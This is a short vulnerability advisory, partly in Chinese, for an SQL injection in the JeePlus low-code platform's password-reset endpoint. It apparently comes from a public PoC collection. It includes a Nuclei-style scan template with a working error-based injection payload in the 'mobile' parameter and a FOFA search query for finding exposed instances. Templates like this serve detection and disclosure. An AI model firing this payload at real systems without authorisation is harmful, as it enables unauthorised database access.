漏洞描述
A SQL injection vulnerability exists in the JeePlus low-code development platform, allowing attackers to manipulate database queries.This can lead to unauthorized data access, modification, or potential compromise of the application.
jeeplus-cms-resetpassword-sqli: JeePlus CMS - SQL Injection
PoC代码[已公开]
id: jeeplus-cms-resetpassword-sqli
info:
name: JeePlus CMS - SQL Injection
author: WingBy_fkalis
severity: high
description: |
A SQL injection vulnerability exists in the JeePlus low-code development platform, allowing attackers to manipulate database queries.This can lead to unauthorized data access, modification, or potential compromise of the application.
reference:
- https://github.com/wy876/wiki/blob/main/JeePlus%E4%BD%8E%E4%BB%A3%E7%A0%81%E5%BC%80%E5%8F%91%E5%B9%B3%E5%8F%B0/JeePlus%E4%BD%8E%E4%BB%A3%E7%A0%81%E5%BC%80%E5%8F%91%E5%B9%B3%E5%8F%B0%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
- http://www.cstam.oyg.cn/detail/429410
metadata:
verified: true
max-request: 1
fofa-query: body="jeeplus.js" && body="/static/common/"
tags: jeeplus,jeecg,sqli,vuln
variables:
num: "999999999"
http:
- method: GET
path:
- "{{BaseURL}}/a/sys/user/resetPassword?mobile=13588888888%27and%20(updatexml(1,concat(0x7e,(select%20md5({{num}})),0x7e),1))%23"
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains_all(body,'c8c605999f3d8352d7bb792cf3fdb25', 'XPATH')"
condition: and
# digest: 4a0a0047304502206768d55c57eb051dd7c3ac2465cf41ebbec2d28345c6991f9531fe7a8f30dfbd022100d1d66671a005999c3b2b93833f1c24177534406d565b36a42ceefb7ce426df17:922c64590222798bb761d5b6d8e72950